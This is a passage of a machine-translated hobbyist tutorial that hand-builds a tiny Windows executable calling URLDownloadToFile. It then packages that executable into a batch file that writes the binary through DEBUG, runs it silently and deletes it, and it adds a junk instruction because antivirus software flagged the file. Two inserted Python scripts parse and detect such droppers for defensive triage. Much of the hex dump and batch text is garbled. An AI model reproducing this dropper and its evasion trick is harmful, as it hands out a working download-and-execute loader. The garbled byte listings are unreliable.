V. Solution: creating the file
Now let's go back and organize the whole process, with the help of this table:
Code
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F00000000 4D 5A 5B 00 00 00 00 00 00 00 00 00 00 00 00 00 MZ [............. 00000010 00 00 00 00 00 00 00 00 0,000,000,000,000,000 ................ 00000020 0,000,000,000,000,000 0,000,000,000,000,000 .. .............. 000000 聽 00 00 00 00 00 00 00 00 00 00 ...........] @ ... 0000000040 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 PE..L ........... 00000050 00 00 00 00 70 00 0F 01 0B 01 00 00 00 02 00 00 .... p ........... 00000060 00 00 00 00 00 00 00 00 79 01 00 00 00 00 00 00 ........ y ....... 00000070 00 00 00 00 00 00 40 00 0,010,000,000,020,000 ...... @ ......... 00000080 0,000,000,000,000,000 0,400,000,000,000,000 ..... ........... 00000090 00 30 00 00 00 02 00 00 00 00 00 00 02 00 00 00 .0 .............. 000000A0 00 01 00 00 00 00 00 00 00 01 00 00 00 10 00 00 ................ 000000B0 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ...... ........ 00000 0c0 28 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 ............ `..`000000F0 00 00 00 00 00 00 00 00 00 | .............. 0000110 00 00 00 00 00 00 00 00 00 00 00 .... `..`
........ 00000120 58 11 00 00 00 00 00 00 50 11 00 00 00 00 00 00 X ....... P ....... 00000130 00 00 00 00 6E 11 00 00 20 11 00 00 00 00 00 ... n ....... 0000140 00 00 00 00 00 00 00 00 00 ............... ...... 00000150 58 11 00 00 00 00 00 00 5B 00 00 00 00 00 00 00 ........ [....... 00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0000 00 00 00 00 00 00 00 ........... .. 00 00 00 00 ... .... 000001B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ............. ... 000001E0 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0000 00 00 00 00 00 00 5d ...
The data of this PE file is mostly "filler": the important parts have been removed, and we can write our own data into the two large blank regions that are left.
The first blank runs from address 00000002 to address 0000003B, 56 bytes.
The second is the 160 bytes from address 00000160 to the end of the PE file. (You can also start from 00000158, which gives 168 bytes.)
Because our program is short, the second region's 168 bytes are basically enough on their own; we don't need the first 56-byte region. Keeping the data in one place is also more convenient, isn't it? ^_^
What goes into this space? Roughly three parts:
1. The import table, including the strings for the DLL "URLMON.DLL" and its function "URLDownloadToFile".
2. The executable code of the file.
3. The data the function needs.
First, the import table. From the previous section it is easy to determine that the entry for "URLDownloadToFile" is filled in as "58 11 00 00". Of course you can change this value; it is simply the one I chose. The point is that wherever the name entry of the import table is placed, this "58 11 00 00" has to point to it. So we write the string "31 00 URLDOWNLOADTOFILE" at position 00000158 of the PE file; the two hex bytes in front are the hint (ordinal), which gives the loader a starting point when it looks up the function's exported address in the DLL.
(Right, an explanation here: this document also marks a lot of "attention" points. Why? Look closely and you will find they are all related to locations. That is because the addresses in a PE file are addresses in memory. This speeds up loading, but it also causes a lot of trouble for the loader and for us. Take this "58 11 00 00" address: because our section is loaded at 1000h, the corresponding location in the file is 158h. Note that not every address can be calculated this simply; it works here because we set PointerToRawData to 100h, which makes calculating the relative address convenient. For other PE files, working out the file address from the memory address is not so simple. ^_^ .. Of course there are plenty of conversion functions for this, RVA to offset.) Next, fill in "6E 11 00 00" as the address pointing to the "URLMON.DLL" string; this value can also be changed.
Finally, we have to record where the loader will store the address it ultimately resolves, namely "20 11 00 00".
[Note: these operations correspond to the IMAGE_IMPORT_DESCRIPTOR and IMAGE_THUNK_DATA32 structures; if you don't understand them, look up those two structures.]
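To make the IMAGE_IMPORT_DESCRIPTOR / IMAGE_THUNK_DATA32 walk and the RVA-to-offset conversion mentioned above concrete, here is an added Python example (not part of the original article): a small import-table parser that maps RVAs through the section table and flags imports of download APIs, the kind of check an analyst runs on a suspicious executable before it is ever executed. The PE bytes it parses are a constructed, header-only sample with its own consistent layout (one section at RVA 1000h backed by file offset 200h, import directory at RVA 1000h), not the article's dump, and the DOWNLOAD_APIS table is an assumption chosen for this example.

```python
import struct

# Assumed watch list for triage: DLL -> exported functions that fetch a URL to disk.
DOWNLOAD_APIS = {
    "urlmon.dll": {"urldownloadtofilea", "urldownloadtofilew"},
    "wininet.dll": {"internetopenurla", "internetopenurlw"},
}

def _u16(data, off): return struct.unpack_from("<H", data, off)[0]
def _u32(data, off): return struct.unpack_from("<I", data, off)[0]

def _cstring(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii", errors="replace")

def rva_to_offset(data, rva):
    """Translate an RVA to a file offset via the section table. RVAs inside the
    mapped headers (below SizeOfHeaders) translate 1:1, which is why the article's
    header-resident addresses line up with the file. Raises ValueError otherwise."""
    e_lfanew = _u32(data, 0x3C)
    opt = e_lfanew + 24                      # IMAGE_OPTIONAL_HEADER32
    if rva < _u32(data, opt + 60):           # SizeOfHeaders
        return rva
    nsec = _u16(data, e_lfanew + 6)          # NumberOfSections
    sec = opt + _u16(data, e_lfanew + 20)    # SizeOfOptionalHeader -> section table
    for i in range(nsec):
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, sec + 40 * i + 8)
        if va <= rva < va + max(vsize, rawsize):
            return rawptr + (rva - va)
    raise ValueError(f"RVA {rva:#x} is not backed by the file")

def parse_imports(data):
    """Walk IMAGE_IMPORT_DESCRIPTOR entries and their IMAGE_THUNK_DATA32 arrays and
    return {dll_name: [(hint, function_name), ...]} for a PE32 image."""
    e_lfanew = _u32(data, 0x3C)
    opt = e_lfanew + 24
    if _u16(data, opt) != 0x10B or _u32(data, opt + 92) < 2:   # PE32 magic, NumberOfRvaAndSizes
        return {}
    imp_rva, imp_size = struct.unpack_from("<II", data, opt + 96 + 8)  # DataDirectory[1]
    if imp_rva == 0:
        return {}
    imports, desc = {}, rva_to_offset(data, imp_rva)
    for _ in range(max(imp_size // 20, 1)):  # never walk past the declared directory size
        oft, _stamp, _fwd, name_rva, ft = struct.unpack_from("<IIIII", data, desc)
        if name_rva == 0 and ft == 0:        # all-zero terminator descriptor
            break
        dll = _cstring(data, rva_to_offset(data, name_rva))
        thunk, funcs = rva_to_offset(data, oft or ft), []
        while (entry := _u32(data, thunk)) != 0:
            if entry & 0x80000000:           # import by ordinal
                funcs.append((None, f"#{entry & 0xFFFF}"))
            else:                            # IMAGE_IMPORT_BY_NAME: WORD Hint; CHAR Name[]
                ibn = rva_to_offset(data, entry)
                funcs.append((_u16(data, ibn), _cstring(data, ibn + 2)))
            thunk += 4
        imports[dll] = funcs
        desc += 20
    return imports

def flag_download_capable(imports):
    """Return 'dll!function' strings for imports on the watch list."""
    return [f"{dll}!{name}" for dll, funcs in imports.items()
            for _hint, name in funcs if name.lower() in DOWNLOAD_APIS.get(dll.lower(), ())]

SEC_VA, SEC_RAW = 0x1000, 0x200   # constructed sample: section RVA and its file offset

def build_sample():
    """Constructed header-only PE32 image with a one-DLL import table; no code, no payload."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                       # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x44, 0x14C, 1, 0, 0, 0, 0x70, 0x10F)  # file header
    opt = 0x58
    struct.pack_into("<H", img, opt, 0x10B)                       # PE32 magic
    struct.pack_into("<I", img, opt + 28, 0x400000)               # ImageBase
    struct.pack_into("<II", img, opt + 32, 0x1000, 0x200)         # SectionAlignment, FileAlignment
    struct.pack_into("<II", img, opt + 56, 0x2000, 0x200)         # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", img, opt + 92, 2)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 96 + 8, SEC_VA, 0x28)      # import directory
    struct.pack_into("<8sIIIIIIHHI", img, opt + 0x70, b".idata", 0x200, SEC_VA, 0x200, SEC_RAW,
                     0, 0, 0, 0, 0xC0000040)                      # section header
    at = lambda rva: rva - SEC_VA + SEC_RAW
    struct.pack_into("<IIIII", img, at(0x1000), 0x1028, 0, 0, 0x1050, 0x1030)  # descriptor
    struct.pack_into("<II", img, at(0x1028), 0x1038, 0)           # OriginalFirstThunk array
    struct.pack_into("<II", img, at(0x1030), 0x1038, 0)           # FirstThunk (IAT) array
    struct.pack_into("<H", img, at(0x1038), 0x31)                 # hint
    img[at(0x103A):at(0x103A) + 19] = b"URLDownloadToFileA\0"
    img[at(0x1050):at(0x1050) + 11] = b"urlmon.dll\0"
    return bytes(img)

SAMPLE = build_sample()

if __name__ == "__main__":
    imps = parse_imports(SAMPLE)
    for dll, funcs in imps.items():
        print(dll, funcs)
    print("download-capable:", flag_download_capable(imps))
```

The walk uses OriginalFirstThunk when it is present and falls back to FirstThunk, because on disk both arrays hold the same name RVAs; in memory the loader overwrites FirstThunk with resolved addresses, which is exactly the "20 11 00 00" slot the article reserves.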
Next is the executable code. Our goal is very simple: as long as this PE file can download a file, we only need to call the URLDownloadToFile function, so we write a small piece of assembly (remember the calling convention of URLDownloadToFile from before; that is what all that ink was spent on):
Code
PUSH 0          ; 6A 00
PUSH 0          ; 6A 00
PUSH xxxxxxxx   ; 68 xxxxxxxx
PUSH xxxxxxxx   ; 68 xxxxxxxx
PUSH 0          ; 6A 00
CALL xxxxxxxx   ; E8 xxxxxxxx
Because the call follows the Pascal convention, that is stdcall, the parameters are pushed from right to left, so the parameter listed first is the last one pushed. Finally the CALL invokes the URLDownloadToFile function.
The first two xxxxxxxx are the addresses of the two strings, that is, the two important parameters of URLDownloadToFile; the last xxxxxxxx is the address in memory that the operating system fills in for us (remember the "20 11 00 00" mentioned above, where the resolved address is recorded?).
That is most of the code, but then something unfortunate happened. When I used WinHex to fill this code into the PE skeleton and saved it, the anti-virus software deleted it!!!! They treat this as a virus????? Is writing a virus really such an easy thing (..... -_-.) ....
Fortunately there was a backup (otherwise I would have to cry .....). I modified the code, adding some junk (such as MOV EAX, 1) ... The final finished code is:
Code
B8 01 00 00 00       MOV EAX, 1                 ; junk instruction added only to change the byte pattern
6A 00                PUSH 0
6A 00                PUSH 0
68 D0 11 40 00       PUSH 004011D0h             ; points to the local save path string; in this article "C:\\GL123\\00204.jpg" (note the doubled backslashes)
68 A0 11 40 00       PUSH 004011A0h             ; points to the URL string to be downloaded
6A 00                PUSH 0
E8 02 00 00 00       CALL $+7                   ; relative call with offset 2, skipping the two bytes below; the usual way machine code calls a function
C9                   LEAVE
C3                   RET
FF 25 20 11 40 00    JMP DWORD PTR [00401120h]  ; the jump goes through "20 11 00 00"; the "40" comes from the program's preferred load address 00400000; this imitates the format compiled code uses
00 00 00 00                                     ; padding
Where should it be written? Anywhere you like, but please look back at what was said above: there is an address (the "attention 1" location), AddressOfEntryPoint, which locates the entry point of your code. We put the code right behind the import table, at position 00000179h. The last things are the addresses of the two strings, which we already gave in the program:
Code
68 D0 11 40 00
68 A0 11 40 00
With that, the positions of the two strings are fixed. One is 000001D0h, where the address of the file we want to download, "/Article/uploadFiles/200408/20040818230017329.jpg", is saved. Here I allocate 48 bytes of storage; you can set it according to your own needs. Don't forget that the DOS header also has 56 bytes of blank space where data can be written; if necessary, that is another place to modify.
All this nonsense has one purpose: to let everyone understand, and I deliberately introduced the format so that if you want to call other API functions you can do it just as easily; it is not limited to URLDownloadToFile. ^_^ ... such as those ... those ... features .... (I didn't say anything ... heh heh) ..
OK, the final form of this PE file's skeleton looks like this:
Code
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F00000000 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 MZ .............. 00000010 00 00 00 00 00 00 00 00 0,000,000,000,000,000 ................ 00000020 0,000,000,000,000,000 0,000,000,000,000,000 .. .............. 00000030 0,000,000,000,000,000 0,000,000,040,000,000 ............ @ ... 000000405045 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 PE..L ........... 00000050 00 00 00 00 70 00 0F 01 0B 01 00 00 00 02 00 00 .... p ........... 00000060 00 00 00 00 00 00 00 00 79 01 00 00 00 00 00 00 ........ y ....... 00000070 00 00 00 00 00 00 40 00 0,010,000,000,020,000 ...... @ ......... 00000080 0,000,000,000,000,000 0,400,000,000,000,000 ..... ........... 00000090 00 30 00 00 00 02 00 00 00 00 00 00 02 00 00 00 .0 .............. 000000A0 00 01 00 00 00 00 00 00 00 01 00 00 00 10 00 00 ................ 000000B0 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ...... ........ 00000 0c0 28 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 ............ `..`000000F0 00 00 00 00 00 00 00 00 00 | .............. 0000110 00 00 00 00 00 00 00 00 00 00 00 .... `..`
........ 00000120 58 11 00 00 00 00 00 00 50 11 00 00 00 00 00 00 X ....... P ....... 00000130 00 00 00 00 6E 11 00 00 20 11 00 00 00 00 00 ... n ....... 0000140 00 00 00 00 00 00 00 00 00 ............... ... 00 00 00 00 00 00 00 55 52 4C 44 6F 77 x ....... 1.urdow00000160 6e 6C 6F 61 64 54 6F 46 69 6C 65 41 00 00 75 72 NLoadTofilea..ur00000170 6C 6D 6F 6E 2e 64 6C 6C 00 B8 01 00 00 6A 00 00 d1 00 68 D0 11 40 00 68 A0 11 40 00 6A 00 E8 02 JH? @ .h? @. J.?00000190 00 00 00 c9 c3 ff 25 20 11 40 00 00 00 00 00 ... %. @ ... 000001A0 68 74 74 70 3A 2F 2F 77 77 77 2E 73 65 72 67 65 http://www.Serge000001B0 61 75 72 61 2E 6e 65 74 2F 54 47 50 2F 30 30 32 aura.net/tgp/002000001C0 2F 69 6D 61 67 65 73 2F 30 34 2E 6A 70 67 00 00 /images/04.jpg..000001D0 43 3A 5C 5C 47 4C 31 32 33 5C 5C 30 30 32 30 34 C: // GL123 // 00204000001E0 2E 4A 50 47 00 00 00 00 00 00 00 00 00 00 00 00 .Jpg ...
Run this PE file and the picture is downloaded into the GL123 folder on drive C, which shows that our work has succeeded. (Wow, what a sexy MM, mouth watering .....)
VI. Packaging
From here on our EXE exists. Now we turn to DEBUG: the plan is to write the entire PE file's data with the E command and then save it with the W command, so the initial BAT file looks like this:
Code
; Echo off; DEBUG <% ~ s0> nul2> nul; GOTO BEGINE 100 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00E 110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ............ RCX200N E: /TMP/TMP99.TMPWQ: Beginrename E: /TMP/TMP99.TMP TMP99.EXE> NUL2> NULCALL E: / TMP / TMP99.EXEDEL E: /TMP/TMP99.EXE> NUL2> NUL
But this is very ugly ... so I thought there should be a way to optimize it: first fill 512 bytes with 00 using the F command, then write only the needed data at the relative positions. That gave the BATE1 version of the download BAT script. Now this is a real, complete batch file, isn't it?
Code
Echo Off; debug <% ~ s0> NUL2> NUL; GOTO BEGINE 100 4D 5AF 102 2FF 00E 13C 40 00 00 50 45 00 00 01 02E 154 70 00 02E 168 79 01E 176 40 00 00 10 00 00 00 02E 188 04 00 00 00 00 00 00 00 00 30 00 00 00 02E 19C 02 00 00 00 00 01E 1A9 01 00 00 00 10 00 00 00 00 00 00 02E 1C0 28 11 00 00 28 E 1D1 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00- 20 11e 250 58 11 00 00 00 00 31 00 55 52 4C 44 6F 77E 260 6E 6C 6F 61 64 54 6F 46 69 6C 65 41 00 00 75 72e 270 6C 6D 6F 6E 2E 64 6C 6C 00 B8 01 00 00 00 00 00 6A 00E 280 6A 00 68 D0 11 40 00 68 A0 11 40 00 6A 00 E8 02E 293 C9 C3 FF 25 20 11 40E 2A0 "/Article/uploadFiles/200408/20040818230026641.jpg "E 2D0" C: // GL123 / / 00204.jpg "RCX200N E: /TMP/TMP99.TMPWQ: Beginrename E: /TMP/TMP99.TMP TMP99.EXE> NUL2> NULCALL E: /TMP/TMP99.EXEDEL E: /TMP/TMP99.EXE> NUL2> NUL running this BAT, after a fast flash screen, the picture was downloaded to my hard disk after a flash screen .... Gao Jong is coming ..
That is all for this document; it is finished. With this batch file you can download anything from the network. One thing to pay attention to is the length of the download URL: if it is very long, adjust the PE layout so that it fits your URL length. The same applies to the save path.
VII.
If it ended here, most people would have no objections. Unfortunately, this document is still not complete ... To make this record more complete, I will use the MM-download affair as an example to demonstrate how to use this BAT for bulk downloading, as one section of the document, to comfort the diligent eyes. (... ^_^)
First, the complete batch code:
Code
Echo OffsetLocalcD / CD% ~ D0% ~ P0MKDIR TMP> NUL 2> Nulmkdir C: / GL123> NUL 2> Nulset SztempFile = TMP99SET SZTEMPPATH =% ~ D0% ~ P0TMPECHO @eclo off> GF.BATECHO setLocal >> GF.BATECHO CD />>>> GF.BATECHO CD %% ^ ~ d0 %% ^ ~ P0 >> GF.BATecho set szurlfolder = 00 %% 1 >> GF.BATECHO SET SZURLFOLDER = %% SZURLFOLDER: ^ ~ -3 %% >> GF . batecho set szurlfile = 0 %% 2 >> GF.BATECHO SET SZURLFILE = %% SZURLFILE: ^ ~ -2 %% >> GF.BATECHO SET SZURLGETFILE = / Article / UploadFiles / 200408 / 20040818230035743.jpg >> GF.BATECHO Set szlocalfile = c: //g1123//%%Szurlfolder%%%%Szurlfile%%.jpg >> gf.batecho echo; echo off ^> DL.BAT >> GF.BATECHO ECHO; Debug ^^^^ <%% %% ^^^ ~ S0 ^^^> NUL2 ^^^> NUL ^> ^> DL.BAT >> GF.BATECHO Echo; Goto Run ^> ^> DL.BAT >> GF.BATECHO ECHO E 100 4D 5A ^> ^> dl.bat >> GF.BATECHO ECHO F 102 2ff 00 ^> ^> DL.BAT >> GF.BATECHECHO ECHO E 13C 40 00 00 50 45 00 00 4c 01 02 ^> ^> DL.bat >> GF.BATECHO ECHO E 154 70 00 0F 01 0B 01 00 00 02 ^> ^> DL.BAT >> GF.BATECHECHO ECHO E 168 79 01 ^> ^> DL.BAT >> GF.BATECHO Echo E 176 40 00 00 10 00 00 00 02 ^> ^> DL.BAT >> GF.BATECHO ECHO E 188 04 00 00 00 00 00 00 30 0 0 00 00 02 ^> ^> dl.bat >> gf.batecho ECHO E 19C 02 00 00 00 00 01 ^> ^> dl.bat >> gf.batecho ECHO E 1A9 01 00 00 00 10 00 00 00 00 00 00 02 ^> ^> DL.BAT >> GF.BATECHO ECHO E 1C0 28 11 00 00 28 ^> ^> DL.BAT >> GF.BATECHO ECHO E 1D1 02 00 00 10 00 00 00 00 00 00 00 01 ^> ^> DL.BAT >> GF.BATECHO ECHO E 1EC 60 00 00 60 ^> ^> DL.BAT >> GF.BATECHO ECHO E 1F8 02 00 00 00 00 00 00 02 ^> ^> DL. BAT >> GF.BATECHO ECHO E 214 60 00 00 60 ^> ^> DL.BAT >>
GF.BATECHO ECHO E 220 58 11 00 00 00 00 50 11 ^> ^> DL.BAT >> GF.BATECHO Echo E 234 6e 11 00 00 20 11 ^> ^> DL.BAT >> GF.BATECHO ECHO E 250 58 11 00 00 00 00 31 00 55 52 4C 44 6F 77 ^> ^> DL.BAT >> GF.BATECHO ECHO E 260 6E 6C 6F 61 64 54 6F 46 69 6C 65 41 00 75 72 ^ > ^> DL.BAT >> GF.BATECHO ECHO E 270 6C 6D 6F 6E 2E 64 6C 6C 00 B8 01 00 00 6A 00 ^> ^> DL.BAT >> GF.BATECHO ECHO E 280 6A 00 68 D0 11 40 00 68 A0 11 40 00 6A 00 E8 02 ^> ^> DL.BAT >> GF.BATECHO ECHO E 293 C9 C3 FF 25 20 11 40 ^> ^> DL.BAT >> GF.BATECHO ECHO E 2A0 "% % szurlgetfile %% "^> ^> DL.BAT >> GF.BATECHO ECHO E 2D0" %% SZLOCALFILE %% "^> ^> DL.BAT >> GF.BATECHO ECHO RCX ^> ^> DL.BAT >> GF.BATECHO ECHO 200 ^> ^> DL.BAT >> GF.BATECHO ECHO N% SZTEMPPATH% /% sztempfile% .tmp ^> ^> DL.BAT >> GF.BATECHO ECHO W ^> ^> DL.BAT> > gf.batecho echo q ^> ^> DL.BAT >> GF.BATECHO Echo: Run ^> ^> DL.BAT >> GF.BATECHO Echo rename% Sztemppath% /% sztempFile% .tmp% sztempfile% .exe ^ ^^> NUL2 ^^^> NUL ^> ^> DL.BAT >> GF.BATECHO Echo call% sztemppath% /% sztempfile% .exe ^> ^> DL.BAT >> GF.BATECHO ECHO DEL% SZTEMPPP path% / % SZ Tempfile% .exe ^^^> NUL2 ^^^> NUL ^> ^> DL.BAT >> GF.BATECHO Echo Download %% SzurlgetFile %% == ^^^> %% SzlocalFile %% >> GF.BATECHO CALL Dl.bat >> GF.BATECHO Echo ... ok! >> gf.batecho endlocal >> gf.bat: echo @echo on >> GF.BATFOR / L %% I in (1, 1, 162) Do FOR / L %% J IN (1, 12) Do Call GF.BAT %% I %% JDEL GF.BAT> NUL 2> Nuldel DL.BAT> NUL 2> Nulrmdir TMP> NUL 2> NUL Echo All Ok! endlocalecho on If you understand the previous one as a batch code, this is basically no problem.
The steps of this batch:
1. After it runs, it creates a "GL123" folder on your C drive for saving the downloaded pictures (this is also the only shortcoming: I can't write into a custom folder ... :( ).
2. It generates two sub-batch files and a "TMP" temporary directory in the current directory ...
3. It then loops to download all the pictures, showing the progress, and finally displays "all ok".
4. It deletes all temporary files.
Some points in this BAT that I will explain:
1. RCX is DEBUG's command for writing the CX register: assign it the size of the file we want to write, then use the N command to give the file name and W to write it (or L to load it).
2. Q quits DEBUG (you don't want the BAT file never to return ...).
3. > NUL and 2> NUL discard all standard output and error output ... you don't want "1 file(s) copied .." appearing while downloading.
4. Special characters that you want to write into a file must be escaped with the "^" symbol.
5. For URLs where the file name increments, such as http://www.xxx.com/0001.jpg, http://www.xxx.com/0002.jpg ..., many people handle this by adding three 0s when the value is less than 9, two 0s when it is greater than 9 and less than 99, three 0s when greater than 99 and less than 999 ..... My method is uniform: add enough 0s to the value, then take the last 4 characters of the whole string, which is relatively compact code.
6. FOR can be nested to form N-fold loops, but there is a drawback: inside it I can't use SET ... (see the help for details; in short it is very troublesome ... -_- .. this is also why multiple BAT files are used to get it done).
7. It is best to enter the current directory before any file handling (including creating and deleting directories). This batch does so with CD \ and CD %~D0%~P0.
8. In CD %~D0%~P0, %~D0 is an expansion of the %0 variable to the current drive letter, and %~P0 expands to the current directory; for the others, see the Windows command-line help.
9. Make it a habit to wrap the entire batch in SETLOCAL and ENDLOCAL.
10. Because the local path string is stored in memory in one form and in the batch file in another, implementing that conversion would take quite a bit of code (batch is extremely weak at text processing ... -_-), so I haven't written it.
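As an added example (not from the article) covering the packaging technique of section VI and the DEBUG notes above (RCX, N, W, Q, the escaped redirections), here is a Python triage script that recognizes a batch file feeding itself to DEBUG and replays its E/F commands to recover the bytes the W command would write, so the embedded file can be pulled out for analysis without ever running the script. The two batch scripts inside it are constructed: SAMPLE_BAT repeats only the control lines described in the text, with the header reduced to the "MZ" signature and a placeholder string in place of any payload, and BENIGN_BAT is an ordinary copy script; the temp path reuses the article's E:\TMP\TMP99 name.

```python
import re

# Indicators of the packaging pattern: a batch file that pipes itself into DEBUG,
# has DEBUG write bytes and save them with N/W, then renames and runs the result.
DEBUG_SELF_FEED = re.compile(r"\bdebug(?:\.exe)?\b.*<\s*%~?[a-z]*0\b", re.I)
DEBUG_WRITE = re.compile(r"^\s*([ef])\s+([0-9a-f]{1,4})\s+(.*)$", re.I)
DEBUG_TOKEN = re.compile(r'"([^"]*)"|\b([0-9a-f]{1,2})\b', re.I)
STAGE_EXE = re.compile(r"^\s*(?:ren(?:ame)?|copy|move)\s+\S+\s+\S+\.exe\b", re.I)
RUN_EXE = re.compile(r"^\s*(?:call|start)\s+\S+\.exe\b", re.I)

# Constructed sample: control lines of the skeleton described in the text; header bytes
# reduced to the "MZ" signature and a placeholder string instead of a payload.
SAMPLE_BAT = r"""@echo off
debug < %~s0 > nul 2> nul
goto begin
e 100 4D 5A
f 102 2FF 00
e 1A0 "constructed-string"
rcx
200
n E:\TMP\TMP99.TMP
w
q
:begin
rename E:\TMP\TMP99.TMP TMP99.EXE > nul 2> nul
call E:\TMP\TMP99.EXE
del E:\TMP\TMP99.EXE > nul 2> nul
"""

# Constructed benign script for comparison.
BENIGN_BAT = r"""@echo off
setlocal
copy report.txt backup\report.txt > nul
echo done
endlocal
"""

def emulate_debug_writes(text):
    """Replay DEBUG's E (enter bytes or a quoted string) and F (fill inclusive range)
    commands into a 64 KiB segment image, so the bytes handed to W can be inspected."""
    mem = bytearray(0x10000)
    for line in text.splitlines():
        m = DEBUG_WRITE.match(line)
        if not m:
            continue
        cmd, addr, rest = m.group(1).lower(), int(m.group(2), 16), m.group(3)
        if cmd == "f":
            parts = rest.split()
            if len(parts) < 2:
                continue
            end, value = int(parts[0], 16), int(parts[1], 16) & 0xFF
            if addr <= end < len(mem):
                mem[addr:end + 1] = bytes([value]) * (end - addr + 1)
        else:
            out = bytearray()
            for quoted, hexbyte in DEBUG_TOKEN.findall(rest):
                if quoted:
                    out += quoted.encode("latin-1")
                elif hexbyte:
                    out.append(int(hexbyte, 16))
            if addr + len(out) <= len(mem):
                mem[addr:addr + len(out)] = out
    return bytes(mem)

def dropped_payload(text):
    """Cut out exactly what W would save: CX bytes starting at CS:100 (the RCX value
    is the hex line that follows the 'rcx' command)."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    size = 0
    for i, line in enumerate(lines[:-1]):
        if line.lower() == "rcx" and re.fullmatch(r"[0-9a-f]{1,4}", lines[i + 1], re.I):
            size = int(lines[i + 1], 16)
    return emulate_debug_writes(text)[0x100:0x100 + size]

def scan_batch(text):
    """Report each indicator and an overall verdict for one batch script."""
    lines = text.splitlines()
    stripped = [l.strip().lower() for l in lines]
    image = emulate_debug_writes(text)
    report = {
        "self_feeds_debug": any(DEBUG_SELF_FEED.search(l) for l in lines),
        "debug_write_lines": sum(1 for l in lines if DEBUG_WRITE.match(l)),
        "saves_file": "w" in stripped and any(l.startswith("n ") for l in stripped),
        "stages_exe": any(STAGE_EXE.match(l) for l in lines),
        "runs_exe": any(RUN_EXE.match(l) for l in lines),
        "drops_mz_image": image[0x100:0x102] == b"MZ",
    }
    report["verdict"] = ("suspicious" if report["self_feeds_debug"] and report["debug_write_lines"]
                         and (report["runs_exe"] or report["drops_mz_image"]) else "clean")
    return report

if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_BAT), ("benign", BENIGN_BAT)):
        print(name, scan_batch(script))
    print("dropped bytes:", dropped_payload(SAMPLE_BAT)[:8].hex())
```

The verdict deliberately keys on the combination (self-feeding DEBUG plus written bytes plus either an executed .exe or an MZ header at CS:100) rather than on DEBUG alone, since DEBUG in a script is not by itself malicious; the recovered payload is what you hand to a PE parser or a sandbox.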
VIII.
In fact, the title of this article could have been changed to "Calling APIs from batch", but I felt that was overreaching; after all, calling an API is really writing a program. Also, to make this document presentable, I added a considerable amount of PE format analysis, which has only a slight relation to the topic ... it still feels a bit like the guest overshadowing the host ...
After finishing these features, I realize how hard people doing low-level work have it ... Writing programs in VC already made me a very happy child ... (As I said that, ZV quietly took out a small hand and wiped it .... I must be a master! I must endure what others cannot, so ZV stubbed the cigarette out on his arm .... sweat, it hurts a lot, of course it doesn't ~~~ haha) ..
The two main tools used in this article are Microsoft's old veterans; I hadn't seen them in a long time. It is also a bit of nostalgia for these nearly forgotten techniques (it is said that WPS under UCDOS was great, using DEBUG and PF ... -_- ...). In fact, even when Windows isn't open, it is still quite interesting, heh.
Finally, for this lengthy, bloated, error-ridden, garbage-filled, plagiarized, confused, evil, badly worded document with a bit of personal blood in it, thank you for spending so much time. If you think you gained a little something, post a reply for me, or write "hard work"; that is also a small comfort to me .. ^_^ ..
IX. References
<< do all in cmd shell >> - zZZEVAZZZ (EVA is really pitiful; I found that many authors of this kind of document went to his writing for their material ... -_-.)
<< Handmade micro Win32 executable >> - Watercloud
<< ICZelion's PE Tutorial >> - ICZelion
<< A Tour of the Win32 Portable Executable File Format >> - MSDN
Some scattered BAT and DEBUG usage notes were obtained from Baidu and Google.
End of article.